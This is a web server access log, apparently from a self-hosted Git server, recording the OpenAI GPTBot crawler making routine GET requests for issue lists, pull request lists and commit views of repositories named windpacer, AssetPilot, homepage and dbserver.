git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118258] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72665] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72704] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:19:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" +[17/Feb/2026:19:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118393] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71837] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71836] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71842] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118428] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71838] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71815] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 69776] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71841] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118426] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71812] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71844] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 115843] [Gzip 6.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118288] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118292] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 114340] [Gzip 6.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118256] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11204] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:19:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 